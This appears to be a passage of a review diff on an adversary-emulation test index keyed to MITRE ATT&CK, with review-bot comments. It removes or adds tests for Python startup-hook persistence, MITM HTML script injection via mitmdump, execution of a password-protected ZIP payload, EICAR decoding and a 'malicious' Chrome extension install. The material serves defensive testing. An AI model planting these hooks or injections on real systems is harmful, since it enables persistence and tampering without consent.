T1556.005:
technique:
@@ -56690,35 +55788,7 @@ discovery:
- Windows
x_mitre_version: '1.0'
identifier: T1652
atomic_tests:
- name: Device Driver Discovery (Linux)
auto_generated_guid: d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1
description: 'Displays a list of loaded kernel modules on a Linux system, which
is used to enumerate drivers.
'
supported_platforms:
- linux
executor:
command: 'lsmod
'
name: bash
elevation_required: false
- name: Enumerate Kernel Driver Files (Linux)
auto_generated_guid: 13c0fef5-9be9-4d7f-9c6b-901624e53770
description: 'Finds and lists all kernel driver files on a Linux system in order
to provide a broader view of available drivers, not just loaded ones.
'
supported_platforms:
- linux
executor:
command: 'find /lib/modules/$(uname -r)/kernel/drivers -name "*.ko*"
'
name: bash
elevation_required: false
atomic_tests: []
T1087.002:
technique:
type: attack-pattern
@@ -57315,21 +56385,6 @@ discovery:
'
name: bash
- name: System Service Discovery - Linux init scripts
auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
description: |
Enumerates system services by listing SysV init scripts and runlevel
symlinks under /etc/init.d and /etc/rc*.d.
supported_platforms:
- linux
executor:
name: sh
command: |
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
T1040:
technique:
type: attack-pattern
@@ -59113,21 +58168,6 @@ discovery:
x_mitre_version: '2.5'
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
description: |
List active TCP/UDP network connections using ss, with lsof as a fallback
when ss is unavailable. Serves as an alternative to the netstat-based test.
supported_platforms:
- linux
- macos
executor:
name: bash
command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
-ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
fi
'
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
description: |
@@ -59154,19 +58194,6 @@ discovery:
netstat
who -a
name: sh
- name: System Network Connections Discovery via sockstat (Linux, FreeBSD)
auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b
description: 'Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
'
supported_platforms:
- linux
executor:
name: sh
command: |
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1497:
technique:
type: attack-pattern
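Review bot: the removed `sockstat` test is inconsistent on its face: the name says `(Linux, FreeBSD)`, the description says `on FreeBSD`, but `supported_platforms` lists only `linux`, and sockstat is a FreeBSD utility that is not present on most Linux distributions. If this test is restored after the conversion, align the platform list with the tool or add a `command -v sockstat` prereq so the executor does not fail on every Linux host.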
@@ -69516,68 +68543,7 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
atomic_tests: []
T1078.001:
technique:
type: attack-pattern
+35 -435
View File
@@ -1328,10 +1328,10 @@ defense-evasion:
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
Ignore
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
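Review bot: of the two variants in this hunk, `cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.` is a sentence, not a PowerShell command, so the executor's cleanup step will either error or do nothing, and `Out-File T1027.013_decodedEicar.txt` drops the `$env:temp\` prefix and writes the EICAR string into whatever the current working directory happens to be. Keep the `$env:temp\T1027.013_decodedEicar.txt` path with `Remove-Item ... -Force -ErrorAction Ignore` as the cleanup.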
@@ -1346,59 +1346,15 @@ defense-evasion:
command: |-
$encryptedString = "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"
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
-ErrorAction Ignore
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
- name: Password-Protected ZIP Payload Extraction and Execution
auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
description: |
Extracts and executes a script from a password-protected ZIP archive.
This technique is commonly used by malware families like Emotet and QBot to deliver payloads
via email attachments where the password is provided in the message body.
The encrypted ZIP evades static file analysis until extracted at runtime.
Upon successful execution, displays confirmation and system information.
supported_platforms:
- linux
- macos
input_arguments:
zip_password:
description: Password used to protect the ZIP archive
type: String
default: infected
dependency_executor_name: bash
dependencies:
- description: 'zip and unzip must be installed
'
prereq_command: 'which zip && which unzip
'
get_prereq_command: 'echo "Install zip and unzip using your package manager
(apt-get, yum, or brew)"
'
executor:
command: |
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
cleanup_command: |
rm -f /tmp/art_payload.sh
rm -f /tmp/art_encrypted.zip
name: bash
T1014:
technique:
type: attack-pattern
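Review bot: same cleanup regression as the decode test above: `cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.` is not executable and `out-file T1027.013_decryptedEicar.txt` loses the `$env:temp\` prefix. The hunk also drops the entire `Password-Protected ZIP Payload Extraction and Execution` test (59 lines to 15); if that is deliberate, say so, otherwise it is the regeneration losing tests again. Note the dropped test's `get_prereq_command` only echoes an install hint instead of installing zip/unzip, so `prereq_command` keeps failing on a host without them.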
@@ -13604,7 +13560,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -13634,7 +13590,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -23123,7 +23078,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -23159,102 +23114,7 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
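Review bot: both Python startup-hook tests are removed from T1546.018 here (102 lines to 7). If they come back after the conversion, fix the lookup order in the macOS test: `prereq_command` resolves `command -v python || command -v #{python_exe}` while the executor resolves `command -v #{python_exe} || command -v python`, so a host with a legacy `python` and a separate `python3` can fail the `-m venv --help` prereq even though the executor would have used python3. The usercustomize cleanup also leaves `$USER_PACKAGES` unquoted in `[ ! -f $USER_PACKAGES/usercustomize.py ]`, which breaks if the home path contains spaces.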
@@ -26454,7 +26314,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -26477,7 +26337,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -30824,6 +30683,20 @@ persistence:
3. Click 'Select'
name: manual
- name: Chrome/Chromium (Chrome Web Store)
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
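Review bot: the added `Chrome/Chromium (Chrome Web Store)` manual test has no cleanup steps, so running it leaves the "Minimum Viable Malicious Extension" installed in the tester's browser profile after the test completes; add manual cleanup steps (remove the extension from chrome://extensions) next to the install `steps` so the persistence artifact does not outlive the test.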
@@ -30892,7 +30765,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -30913,7 +30786,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -35743,7 +35615,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -35779,102 +35651,7 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -36475,7 +36252,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -36505,7 +36282,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -38460,7 +38236,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -38487,7 +38263,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -38889,68 +38664,7 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
atomic_tests: []
T1205:
technique:
type: attack-pattern
@@ -50527,7 +50241,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -50557,7 +50271,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -51628,34 +51341,7 @@ discovery:
- Windows
x_mitre_version: '1.0'
identifier: T1652
atomic_tests:
- name: List loaded kernel extensions (macOS)
auto_generated_guid: 71eab73d-5d7d-4681-9a72-7873489a5b85
description: 'Displays a list of loaded kernel extensions (kexts) on a macOS
system.
'
supported_platforms:
- macos
executor:
command: 'kextstat
'
name: bash
elevation_required: false
- name: Find Kernel Extensions (macOS)
auto_generated_guid: c63bbe52-6f17-4832-b221-f07ba8b1736f
description: 'Searches for kernel extension (kext) files on a macOS system.
'
supported_platforms:
- macos
executor:
command: 'kextfind
'
name: bash
elevation_required: false
atomic_tests: []
T1087.002:
technique:
type: attack-pattern
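Review bot: the removed T1652 macOS tests call `kextstat` and `kextfind`; `kextstat` is deprecated on macOS 11 and later in favour of `kmutil showloaded`, and `kextfind` may not be present on current releases, so if these tests are restored after the conversion they need a `command -v` prereq for each tool or a `kmutil` alternative so the executor fails loudly instead of silently doing nothing.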
@@ -52102,17 +51788,7 @@ discovery:
- Windows
x_mitre_version: '1.6'
identifier: T1007
atomic_tests:
- name: System Service Discovery - macOS launchctl
auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
description: |
Enumerates services on macOS using launchctl. Used by adversaries for
identifying daemons, background services, and persistence mechanisms.
supported_platforms:
- macos
executor:
name: sh
command: launchctl list
atomic_tests: []
T1040:
technique:
type: attack-pattern
@@ -53658,21 +53334,6 @@ discovery:
x_mitre_version: '2.5'
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
description: |
List active TCP/UDP network connections using ss, with lsof as a fallback
when ss is unavailable. Serves as an alternative to the netstat-based test.
supported_platforms:
- linux
- macos
executor:
name: bash
command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
-ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
fi
'
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
description: |
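Review bot: removing the `ss`/`lsof` test (guid bcf05343-...) loses coverage on Linux hosts without `netstat`: its own description names it as the fallback for the netstat-based test kept directly below it. If the removal is intentional, say so in the commit message; otherwise this is another entry the converter has emptied.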
@@ -63575,68 +63236,7 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
